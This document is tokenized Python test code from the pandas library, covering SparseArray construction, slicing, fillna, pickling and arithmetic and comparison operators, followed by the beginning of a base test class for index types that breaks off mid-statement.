( arr . fill_value ) <EOL> arr = SparseArray ( [ True , False , True ] , dtype = np . bool ) <EOL> self . assertEqual ( arr . dtype , np . bool ) <EOL> self . assertFalse ( arr . fill_value ) <EOL> arr = SparseArray ( [ True , False , True ] , dtype = np . bool , fill_value = True ) <EOL> self . assertEqual ( arr . dtype , np . bool ) <EOL> self . assertTrue ( arr . fill_value ) <EOL> def test_constructor_float32 ( self ) : <EOL> data = np . array ( [ <NUM_LIT:1.> , np . nan , <NUM_LIT:3> ] , dtype = np . float32 ) <EOL> arr = SparseArray ( data , dtype = np . float32 ) <EOL> self . assertEqual ( arr . dtype , np . float32 ) <EOL> tm . assert_numpy_array_equal ( arr . sp_values , np . array ( [ <NUM_LIT:1> , <NUM_LIT:3> ] ) ) <EOL> tm . assert_numpy_array_equal ( arr . sp_values , np . asarray ( arr ) ) <EOL> tm . assert_numpy_array_equal ( arr . sp_index . indices , np . array ( [ <NUM_LIT:0> , <NUM_LIT:2> ] ) ) <EOL> for dense in [ arr . to_dense ( ) , arr . values ] : <EOL> self . assertEqual ( dense . dtype , np . float32 ) <EOL> self . assert_numpy_array_equal ( dense , data ) <EOL> def test_astype ( self ) : <EOL> res = self . arr . astype ( '<STR_LIT>' ) <EOL> res . sp_values [ : <NUM_LIT:3> ] = <NUM_LIT> <EOL> self . assertFalse ( ( self . arr . sp_values [ : <NUM_LIT:3> ] == <NUM_LIT> ) . any ( ) ) <EOL> assertRaisesRegexp ( TypeError , "<STR_LIT>" , self . arr . astype , '<STR_LIT>' ) <EOL> def test_copy_shallow ( self ) : <EOL> arr2 = self . arr . copy ( deep = False ) <EOL> def _get_base ( values ) : <EOL> base = values . base <EOL> while base . base is not None : <EOL> base = base . base <EOL> return base <EOL> assert ( _get_base ( arr2 ) is _get_base ( self . arr ) ) <EOL> def test_values_asarray ( self ) : <EOL> assert_almost_equal ( self . arr . values , self . arr_data ) <EOL> assert_almost_equal ( self . arr . to_dense ( ) , self . arr_data ) <EOL> assert_almost_equal ( self . arr . sp_values , np . asarray ( self . arr ) ) <EOL> def test_to_dense ( self ) : <EOL> vals = np . array ( [ <NUM_LIT:1> , np . nan , np . nan , <NUM_LIT:3> , np . nan ] ) <EOL> res = SparseArray ( vals ) . to_dense ( ) <EOL> tm . assert_numpy_array_equal ( res , vals ) <EOL> res = SparseArray ( vals , fill_value = <NUM_LIT:0> ) . to_dense ( ) <EOL> tm . assert_numpy_array_equal ( res , vals ) <EOL> vals = np . array ( [ <NUM_LIT:1> , np . nan , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:0> ] ) <EOL> res = SparseArray ( vals ) . to_dense ( ) <EOL> tm . assert_numpy_array_equal ( res , vals ) <EOL> res = SparseArray ( vals , fill_value = <NUM_LIT:0> ) . to_dense ( ) <EOL> tm . assert_numpy_array_equal ( res , vals ) <EOL> vals = np . array ( [ np . nan , np . nan , np . nan , np . nan , np . nan ] ) <EOL> res = SparseArray ( vals ) . to_dense ( ) <EOL> tm . assert_numpy_array_equal ( res , vals ) <EOL> res = SparseArray ( vals , fill_value = <NUM_LIT:0> ) . to_dense ( ) <EOL> tm . assert_numpy_array_equal ( res , vals ) <EOL> def test_getitem ( self ) : <EOL> def _checkit ( i ) : <EOL> assert_almost_equal ( self . arr [ i ] , self . arr . values [ i ] ) <EOL> for i in range ( len ( self . arr ) ) : <EOL> _checkit ( i ) <EOL> _checkit ( - i ) <EOL> def test_getslice ( self ) : <EOL> result = self . arr [ : - <NUM_LIT:3> ] <EOL> exp = SparseArray ( self . arr . values [ : - <NUM_LIT:3> ] ) <EOL> tm . assert_sp_array_equal ( result , exp ) <EOL> result = self . arr [ - <NUM_LIT:4> : ] <EOL> exp = SparseArray ( self . arr . values [ - <NUM_LIT:4> : ] ) <EOL> tm . assert_sp_array_equal ( result , exp ) <EOL> result = self . arr [ - <NUM_LIT:12> : ] <EOL> exp = SparseArray ( self . arr ) <EOL> tm . assert_sp_array_equal ( result , exp ) <EOL> result = self . arr [ : - <NUM_LIT:12> ] <EOL> exp = SparseArray ( self . arr . values [ : <NUM_LIT:0> ] ) <EOL> tm . assert_sp_array_equal ( result , exp ) <EOL> def test_getslice_tuple ( self ) : <EOL> dense = np . array ( [ np . nan , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:0> , <NUM_LIT:5> , np . nan , np . nan , <NUM_LIT:0> ] ) <EOL> sparse = SparseArray ( dense ) <EOL> res = sparse [ <NUM_LIT:4> : , ] <EOL> exp = SparseArray ( dense [ <NUM_LIT:4> : , ] ) <EOL> tm . assert_sp_array_equal ( res , exp ) <EOL> sparse = SparseArray ( dense , fill_value = <NUM_LIT:0> ) <EOL> res = sparse [ <NUM_LIT:4> : , ] <EOL> exp = SparseArray ( dense [ <NUM_LIT:4> : , ] , fill_value = <NUM_LIT:0> ) <EOL> tm . assert_sp_array_equal ( res , exp ) <EOL> with tm . assertRaises ( IndexError ) : <EOL> sparse [ <NUM_LIT:4> : , : ] <EOL> with tm . assertRaises ( IndexError ) : <EOL> dense [ <NUM_LIT:4> : , : ] <EOL> def test_binary_operators ( self ) : <EOL> data1 = np . random . randn ( <NUM_LIT:20> ) <EOL> data2 = np . random . randn ( <NUM_LIT:20> ) <EOL> data1 [ : : <NUM_LIT:2> ] = np . nan <EOL> data2 [ : : <NUM_LIT:3> ] = np . nan <EOL> arr1 = SparseArray ( data1 ) <EOL> arr2 = SparseArray ( data2 ) <EOL> data1 [ : : <NUM_LIT:2> ] = <NUM_LIT:3> <EOL> data2 [ : : <NUM_LIT:3> ] = <NUM_LIT:3> <EOL> farr1 = SparseArray ( data1 , fill_value = <NUM_LIT:3> ) <EOL> farr2 = SparseArray ( data2 , fill_value = <NUM_LIT:3> ) <EOL> def _check_op ( op , first , second ) : <EOL> res = op ( first , second ) <EOL> exp = SparseArray ( op ( first . values , second . values ) , <EOL> fill_value = first . fill_value ) <EOL> tm . assertIsInstance ( res , SparseArray ) <EOL> assert_almost_equal ( res . values , exp . values ) <EOL> res2 = op ( first , second . values ) <EOL> tm . assertIsInstance ( res2 , SparseArray ) <EOL> tm . assert_sp_array_equal ( res , res2 ) <EOL> res3 = op ( first . values , second ) <EOL> tm . assertIsInstance ( res3 , SparseArray ) <EOL> tm . assert_sp_array_equal ( res , res3 ) <EOL> res4 = op ( first , <NUM_LIT:4> ) <EOL> tm . assertIsInstance ( res4 , SparseArray ) <EOL> try : <EOL> exp = op ( first . values , <NUM_LIT:4> ) <EOL> exp_fv = op ( first . fill_value , <NUM_LIT:4> ) <EOL> assert_almost_equal ( res4 . fill_value , exp_fv ) <EOL> assert_almost_equal ( res4 . values , exp ) <EOL> except ValueError : <EOL> pass <EOL> def _check_inplace_op ( op ) : <EOL> tmp = arr1 . copy ( ) <EOL> self . assertRaises ( NotImplementedError , op , tmp , arr2 ) <EOL> bin_ops = [ operator . add , operator . sub , operator . mul , operator . truediv , <EOL> operator . floordiv , operator . pow ] <EOL> for op in bin_ops : <EOL> _check_op ( op , arr1 , arr2 ) <EOL> _check_op ( op , farr1 , farr2 ) <EOL> inplace_ops = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for op in inplace_ops : <EOL> _check_inplace_op ( getattr ( operator , op ) ) <EOL> def test_pickle ( self ) : <EOL> def _check_roundtrip ( obj ) : <EOL> unpickled = self . round_trip_pickle ( obj ) <EOL> tm . assert_sp_array_equal ( unpickled , obj ) <EOL> _check_roundtrip ( self . arr ) <EOL> _check_roundtrip ( self . zarr ) <EOL> def test_generator_warnings ( self ) : <EOL> sp_arr = SparseArray ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> with warnings . catch_warnings ( record = True ) as w : <EOL> warnings . filterwarnings ( action = '<STR_LIT>' , <EOL> category = DeprecationWarning ) <EOL> warnings . filterwarnings ( action = '<STR_LIT>' , <EOL> category = PendingDeprecationWarning ) <EOL> for _ in sp_arr : <EOL> pass <EOL> assert len ( w ) == <NUM_LIT:0> <EOL> def test_fillna ( self ) : <EOL> s = SparseArray ( [ <NUM_LIT:1> , np . nan , np . nan , <NUM_LIT:3> , np . nan ] ) <EOL> res = s . fillna ( - <NUM_LIT:1> ) <EOL> exp = SparseArray ( [ <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:3> , - <NUM_LIT:1> ] , fill_value = - <NUM_LIT:1> ) <EOL> tm . assert_sp_array_equal ( res , exp ) <EOL> s = SparseArray ( [ <NUM_LIT:1> , np . nan , np . nan , <NUM_LIT:3> , np . nan ] , fill_value = <NUM_LIT:0> ) <EOL> res = s . fillna ( - <NUM_LIT:1> ) <EOL> exp = SparseArray ( [ <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:3> , - <NUM_LIT:1> ] , fill_value = <NUM_LIT:0> ) <EOL> tm . assert_sp_array_equal ( res , exp ) <EOL> s = SparseArray ( [ <NUM_LIT:1> , np . nan , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:0> ] ) <EOL> res = s . fillna ( - <NUM_LIT:1> ) <EOL> exp = SparseArray ( [ <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:0> ] , fill_value = - <NUM_LIT:1> ) <EOL> tm . assert_sp_array_equal ( res , exp ) <EOL> s = SparseArray ( [ <NUM_LIT:1> , np . nan , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:0> ] , fill_value = <NUM_LIT:0> ) <EOL> res = s . fillna ( - <NUM_LIT:1> ) <EOL> exp = SparseArray ( [ <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:0> ] , fill_value = <NUM_LIT:0> ) <EOL> tm . assert_sp_array_equal ( res , exp ) <EOL> s = SparseArray ( [ np . nan , np . nan , np . nan , np . nan ] ) <EOL> res = s . fillna ( - <NUM_LIT:1> ) <EOL> exp = SparseArray ( [ - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ] , fill_value = - <NUM_LIT:1> ) <EOL> tm . assert_sp_array_equal ( res , exp ) <EOL> s = SparseArray ( [ np . nan , np . nan , np . nan , np . nan ] , fill_value = <NUM_LIT:0> ) <EOL> res = s . fillna ( - <NUM_LIT:1> ) <EOL> exp = SparseArray ( [ - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ] , fill_value = <NUM_LIT:0> ) <EOL> tm . assert_sp_array_equal ( res , exp ) <EOL> s = SparseArray ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ) <EOL> res = s . fillna ( - <NUM_LIT:1> ) <EOL> exp = SparseArray ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , fill_value = - <NUM_LIT:1> ) <EOL> tm . assert_sp_array_equal ( res , exp ) <EOL> s = SparseArray ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , fill_value = <NUM_LIT:0> ) <EOL> res = s . fillna ( - <NUM_LIT:1> ) <EOL> exp = SparseArray ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , fill_value = <NUM_LIT:0> ) <EOL> tm . assert_sp_array_equal ( res , exp ) <EOL> def test_fillna_overlap ( self ) : <EOL> s = SparseArray ( [ <NUM_LIT:1> , np . nan , np . nan , <NUM_LIT:3> , np . nan ] ) <EOL> res = s . fillna ( <NUM_LIT:3> ) <EOL> exp = np . array ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> ] ) <EOL> tm . assert_numpy_array_equal ( res . to_dense ( ) , exp ) <EOL> s = SparseArray ( [ <NUM_LIT:1> , np . nan , np . nan , <NUM_LIT:3> , np . nan ] , fill_value = <NUM_LIT:0> ) <EOL> res = s . fillna ( <NUM_LIT:3> ) <EOL> exp = SparseArray ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> ] , fill_value = <NUM_LIT:0> ) <EOL> tm . assert_sp_array_equal ( res , exp ) <EOL> class TestSparseArrayArithmetic ( tm . TestCase ) : <EOL> _multiprocess_can_split_ = True <EOL> def _check_numeric_ops ( self , a , b , a_dense , b_dense ) : <EOL> tm . assert_numpy_array_equal ( ( a + b ) . to_dense ( ) , a_dense + b_dense ) <EOL> tm . assert_numpy_array_equal ( ( b + a ) . to_dense ( ) , b_dense + a_dense ) <EOL> tm . assert_numpy_array_equal ( ( a - b ) . to_dense ( ) , a_dense - b_dense ) <EOL> tm . assert_numpy_array_equal ( ( b - a ) . to_dense ( ) , b_dense - a_dense ) <EOL> tm . assert_numpy_array_equal ( ( a * b ) . to_dense ( ) , a_dense * b_dense ) <EOL> tm . assert_numpy_array_equal ( ( b * a ) . to_dense ( ) , b_dense * a_dense ) <EOL> tm . assert_numpy_array_equal ( ( a / b ) . to_dense ( ) , a_dense / b_dense ) <EOL> tm . assert_numpy_array_equal ( ( b / a ) . to_dense ( ) , b_dense / a_dense ) <EOL> tm . assert_numpy_array_equal ( ( a // b ) . to_dense ( ) , a_dense // b_dense ) <EOL> tm . assert_numpy_array_equal ( ( b // a ) . to_dense ( ) , b_dense // a_dense ) <EOL> tm . assert_numpy_array_equal ( ( a % b ) . to_dense ( ) , a_dense % b_dense ) <EOL> tm . assert_numpy_array_equal ( ( b % a ) . to_dense ( ) , b_dense % a_dense ) <EOL> tm . assert_numpy_array_equal ( ( a ** b ) . to_dense ( ) , a_dense ** b_dense ) <EOL> tm . assert_numpy_array_equal ( ( b ** a ) . to_dense ( ) , b_dense ** a_dense ) <EOL> def _check_comparison_ops ( self , a , b , a_dense , b_dense ) : <EOL> def _check ( res ) : <EOL> tm . assertIsInstance ( res , SparseArray ) <EOL> self . assertEqual ( res . dtype , np . bool ) <EOL> self . assertIsInstance ( res . fill_value , bool ) <EOL> _check ( a == b ) <EOL> tm . assert_numpy_array_equal ( ( a == b ) . to_dense ( ) , a_dense == b_dense ) <EOL> _check ( a != b ) <EOL> tm . assert_numpy_array_equal ( ( a != b ) . to_dense ( ) , a_dense != b_dense ) <EOL> _check ( a >= b ) <EOL> tm . assert_numpy_array_equal ( ( a >= b ) . to_dense ( ) , a_dense >= b_dense ) <EOL> _check ( a <= b ) <EOL> tm . assert_numpy_array_equal ( ( a <= b ) . to_dense ( ) , a_dense <= b_dense ) <EOL> _check ( a > b ) <EOL> tm . assert_numpy_array_equal ( ( a > b ) . to_dense ( ) , a_dense > b_dense ) <EOL> _check ( a < b ) <EOL> tm . assert_numpy_array_equal ( ( a < b ) . to_dense ( ) , a_dense < b_dense ) <EOL> def test_float_scalar ( self ) : <EOL> values = np . array ( [ np . nan , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , np . nan , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , np . nan ] ) <EOL> for kind in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> a = SparseArray ( values , kind = kind ) <EOL> self . _check_numeric_ops ( a , <NUM_LIT:1> , values , <NUM_LIT:1> ) <EOL> self . _check_numeric_ops ( a , <NUM_LIT:0> , values , <NUM_LIT:0> ) <EOL> self . _check_numeric_ops ( a , <NUM_LIT:3> , values , <NUM_LIT:3> ) <EOL> a = SparseArray ( values , kind = kind , fill_value = <NUM_LIT:0> ) <EOL> self . _check_numeric_ops ( a , <NUM_LIT:1> , values , <NUM_LIT:1> ) <EOL> self . _check_numeric_ops ( a , <NUM_LIT:0> , values , <NUM_LIT:0> ) <EOL> self . _check_numeric_ops ( a , <NUM_LIT:3> , values , <NUM_LIT:3> ) <EOL> a = SparseArray ( values , kind = kind , fill_value = <NUM_LIT:2> ) <EOL> self . _check_numeric_ops ( a , <NUM_LIT:1> , values , <NUM_LIT:1> ) <EOL> self . _check_numeric_ops ( a , <NUM_LIT:0> , values , <NUM_LIT:0> ) <EOL> self . _check_numeric_ops ( a , <NUM_LIT:3> , values , <NUM_LIT:3> ) <EOL> def test_float_scalar_comparison ( self ) : <EOL> values = np . array ( [ np . nan , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , np . nan , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , np . nan ] ) <EOL> for kind in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> a = SparseArray ( values , kind = kind ) <EOL> self . _check_comparison_ops ( a , <NUM_LIT:1> , values , <NUM_LIT:1> ) <EOL> self . _check_comparison_ops ( a , <NUM_LIT:0> , values , <NUM_LIT:0> ) <EOL> self . _check_comparison_ops ( a , <NUM_LIT:3> , values , <NUM_LIT:3> ) <EOL> a = SparseArray ( values , kind = kind , fill_value = <NUM_LIT:0> ) <EOL> self . _check_comparison_ops ( a , <NUM_LIT:1> , values , <NUM_LIT:1> ) <EOL> self . _check_comparison_ops ( a , <NUM_LIT:0> , values , <NUM_LIT:0> ) <EOL> self . _check_comparison_ops ( a , <NUM_LIT:3> , values , <NUM_LIT:3> ) <EOL> a = SparseArray ( values , kind = kind , fill_value = <NUM_LIT:2> ) <EOL> self . _check_comparison_ops ( a , <NUM_LIT:1> , values , <NUM_LIT:1> ) <EOL> self . _check_comparison_ops ( a , <NUM_LIT:0> , values , <NUM_LIT:0> ) <EOL> self . _check_comparison_ops ( a , <NUM_LIT:3> , values , <NUM_LIT:3> ) <EOL> def test_float_same_index ( self ) : <EOL> for kind in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> values = np . array ( [ np . nan , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , np . nan , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , np . nan ] ) <EOL> rvalues = np . array ( [ np . nan , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , np . nan , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:2> , np . nan ] ) <EOL> a = SparseArray ( values , kind = kind ) <EOL> b = SparseArray ( rvalues , kind = kind ) <EOL> self . _check_numeric_ops ( a , b , values , rvalues ) <EOL> values = np . array ( [ <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT:1.> , <NUM_LIT:0.> ] ) <EOL> rvalues = np . array ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.> ] ) <EOL> a = SparseArray ( values , kind = kind , fill_value = <NUM_LIT:0> ) <EOL> b = SparseArray ( rvalues , kind = kind , fill_value = <NUM_LIT:0> ) <EOL> self . _check_numeric_ops ( a , b , values , rvalues ) <EOL> def test_float_same_index_comparison ( self ) : <EOL> for kind in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> values = np . array ( [ np . nan , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , np . nan , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , np . nan ] ) <EOL> rvalues = np . array ( [ np . nan , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , np . nan , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:2> , np . nan ] ) <EOL> a = SparseArray ( values , kind = kind ) <EOL> b = SparseArray ( rvalues , kind = kind ) <EOL> self . _check_comparison_ops ( a , b , values , rvalues ) <EOL> values = np . array ( [ <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT:1.> , <NUM_LIT:0.> ] ) <EOL> rvalues = np . array ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.> ] ) <EOL> a = SparseArray ( values , kind = kind , fill_value = <NUM_LIT:0> ) <EOL> b = SparseArray ( rvalues , kind = kind , fill_value = <NUM_LIT:0> ) <EOL> self . _check_comparison_ops ( a , b , values , rvalues ) <EOL> def test_float_array ( self ) : <EOL> values = np . array ( [ np . nan , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , np . nan , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , np . nan ] ) <EOL> rvalues = np . array ( [ <NUM_LIT:2> , np . nan , <NUM_LIT:2> , <NUM_LIT:3> , np . nan , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:2> , np . nan ] ) <EOL> for kind in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> a = SparseArray ( values , kind = kind ) <EOL> b = SparseArray ( rvalues , kind = kind ) <EOL> self . _check_numeric_ops ( a , b , values , rvalues ) <EOL> self . _check_numeric_ops ( a , b * <NUM_LIT:0> , values , rvalues * <NUM_LIT:0> ) <EOL> a = SparseArray ( values , kind = kind , fill_value = <NUM_LIT:0> ) <EOL> b = SparseArray ( rvalues , kind = kind ) <EOL> self . _check_numeric_ops ( a , b , values , rvalues ) <EOL> a = SparseArray ( values , kind = kind , fill_value = <NUM_LIT:0> ) <EOL> b = SparseArray ( rvalues , kind = kind , fill_value = <NUM_LIT:0> ) <EOL> self . _check_numeric_ops ( a , b , values , rvalues ) <EOL> a = SparseArray ( values , kind = kind , fill_value = <NUM_LIT:1> ) <EOL> b = SparseArray ( rvalues , kind = kind , fill_value = <NUM_LIT:2> ) <EOL> self . _check_numeric_ops ( a , b , values , rvalues ) <EOL> def test_float_array_different_kind ( self ) : <EOL> values = np . array ( [ np . nan , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , np . nan , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , np . nan ] ) <EOL> rvalues = np . array ( [ <NUM_LIT:2> , np . nan , <NUM_LIT:2> , <NUM_LIT:3> , np . nan , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:2> , np . nan ] ) <EOL> a = SparseArray ( values , kind = '<STR_LIT>' ) <EOL> b = SparseArray ( rvalues , kind = '<STR_LIT>' ) <EOL> self . _check_numeric_ops ( a , b , values , rvalues ) <EOL> self . _check_numeric_ops ( a , b * <NUM_LIT:0> , values , rvalues * <NUM_LIT:0> ) <EOL> a = SparseArray ( values , kind = '<STR_LIT>' , fill_value = <NUM_LIT:0> ) <EOL> b = SparseArray ( rvalues , kind = '<STR_LIT>' ) <EOL> self . _check_numeric_ops ( a , b , values , rvalues ) <EOL> a = SparseArray ( values , kind = '<STR_LIT>' , fill_value = <NUM_LIT:0> ) <EOL> b = SparseArray ( rvalues , kind = '<STR_LIT>' , fill_value = <NUM_LIT:0> ) <EOL> self . _check_numeric_ops ( a , b , values , rvalues ) <EOL> a = SparseArray ( values , kind = '<STR_LIT>' , fill_value = <NUM_LIT:1> ) <EOL> b = SparseArray ( rvalues , kind = '<STR_LIT>' , fill_value = <NUM_LIT:2> ) <EOL> self . _check_numeric_ops ( a , b , values , rvalues ) <EOL> def test_float_array_comparison ( self ) : <EOL> values = np . array ( [ np . nan , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , np . nan , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , np . nan ] ) <EOL> rvalues = np . array ( [ <NUM_LIT:2> , np . nan , <NUM_LIT:2> , <NUM_LIT:3> , np . nan , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:2> , np . nan ] ) <EOL> for kind in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> a = SparseArray ( values , kind = kind ) <EOL> b = SparseArray ( rvalues , kind = kind ) <EOL> self . _check_comparison_ops ( a , b , values , rvalues ) <EOL> self . _check_comparison_ops ( a , b * <NUM_LIT:0> , values , rvalues * <NUM_LIT:0> ) <EOL> a = SparseArray ( values , kind = kind , fill_value = <NUM_LIT:0> ) <EOL> b = SparseArray ( rvalues , kind = kind ) <EOL> self . _check_comparison_ops ( a , b , values , rvalues ) <EOL> a = SparseArray ( values , kind = kind , fill_value = <NUM_LIT:0> ) <EOL> b = SparseArray ( rvalues , kind = kind , fill_value = <NUM_LIT:0> ) <EOL> self . _check_comparison_ops ( a , b , values , rvalues ) <EOL> a = SparseArray ( values , kind = kind , fill_value = <NUM_LIT:1> ) <EOL> b = SparseArray ( rvalues , kind = kind , fill_value = <NUM_LIT:2> ) <EOL> self . _check_comparison_ops ( a , b , values , rvalues ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import nose <EOL> nose . runmodule ( argv = [ __file__ , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> exit = False ) </s>
<s> from pandas import compat <EOL> from pandas . compat import PY3 <EOL> import numpy as np <EOL> from pandas import ( Series , Index , Float64Index , Int64Index , RangeIndex , <EOL> MultiIndex , CategoricalIndex , DatetimeIndex , <EOL> TimedeltaIndex , PeriodIndex ) <EOL> from pandas . util . testing import assertRaisesRegexp <EOL> import pandas . util . testing as tm <EOL> import pandas as pd <EOL> class Base ( object ) : <EOL> """<STR_LIT>""" <EOL> _holder = None <EOL> _compat_props = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:size>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def setup_indices ( self ) : <EOL> for name , idx in self . indices . items ( ) : <EOL> setattr ( self , name , idx ) <EOL> def verify_pickle ( self , index ) : <EOL> unpickled = self . round_trip_pickle ( index ) <EOL> self . assertTrue ( index . equals ( unpickled ) ) <EOL> def test_pickle_compat_construction ( self ) : <EOL> if self . _holder is None : <EOL> return <EOL> self . assertRaises ( TypeError , self . _holder ) <EOL> def test_shift ( self ) : <EOL> idx = self . create_index ( ) <EOL> self . assertRaises ( NotImplementedError , idx . shift , <NUM_LIT:1> ) <EOL> self . assertRaises ( NotImplementedError , idx . shift , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> def test_create_index_existing_name ( self ) : <EOL> expected = self . create_index ( ) <EOL> if not isinstance ( expected , MultiIndex ) : <EOL> expected . name = '<STR_LIT:foo>' <EOL> result = pd . Index ( expected ) <EOL> tm . assert_index_equal ( result , expected ) <EOL> result = pd . Index ( expected , name = '<STR_LIT:bar>' ) <EOL> expected . name = '<STR_LIT:bar>' <EOL> tm . assert_index_equal ( result , expected ) <EOL> else : <EOL> expected . names = [ '<STR_LIT:foo>' , '<STR_LIT:bar>' ] <EOL> result = pd . Index ( expected ) <EOL> tm . assert_index_equal ( <EOL> result , Index ( Index ( [ ( '<STR_LIT:foo>' , '<STR_LIT>' ) , ( '<STR_LIT:foo>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:bar>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] , <EOL> dtype = '<STR_LIT:object>' ) , <EOL> names = [ '<STR_LIT:foo>' , '<STR_LIT:bar>' ] ) ) <EOL> result = pd . Index ( expected , names = [ '<STR_LIT:A>' , '<STR_LIT:B>' ] ) <EOL> tm . assert_index_equal ( <EOL> result , <EOL> Index ( Index ( [ ( '<STR_LIT:foo>' , '<STR_LIT>' ) , ( '<STR_LIT:foo>' , '<STR_LIT>' ) , ( '<STR_LIT:bar>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] , <EOL> dtype = '<STR_LIT:object>' ) , names = [ '<STR_LIT:A>' , '<STR_LIT:B>' ] ) ) <EOL> def test_numeric_compat ( self ) : <EOL> idx = self . create_index ( ) <EOL> tm . assertRaisesRegexp ( TypeError , "<STR_LIT>" , <EOL> lambda : idx * <NUM_LIT:1> ) <EOL> tm . assertRaisesRegexp ( TypeError , "<STR_LIT>" , <EOL> lambda : <NUM_LIT:1> * idx ) <EOL> div_err = "<STR_LIT>" if PY3 else "<STR_LIT>" <EOL> tm . assertRaisesRegexp ( TypeError , div_err , lambda : idx / <NUM_LIT:1> ) <EOL> tm . assertRaisesRegexp ( TypeError , div_err , lambda : <NUM_LIT:1> / idx ) <EOL> tm . assertRaisesRegexp ( TypeError , "<STR_LIT>" , <EOL> lambda : idx // <NUM_LIT:1> ) <EOL> tm . assertRaisesRegexp ( TypeError , "<STR_LIT>" , <EOL> lambda : <NUM_LIT:1> // idx ) <EOL> def test_logical_compat ( self ) : <EOL> idx = self . create_index ( ) <EOL> tm . assertRaisesRegexp ( TypeError , '<STR_LIT>' , <EOL> lambda : idx . all ( ) ) <EOL> tm . assertRaisesRegexp ( TypeError , '<STR_LIT>' , <EOL> lambda : idx . any ( ) ) <EOL> def test_boolean_context_compat ( self ) : <EOL> idx = self . create_index ( ) <EOL> def f ( ) : <EOL> if idx : <EOL> pass <EOL> tm . assertRaisesRegexp ( ValueError , 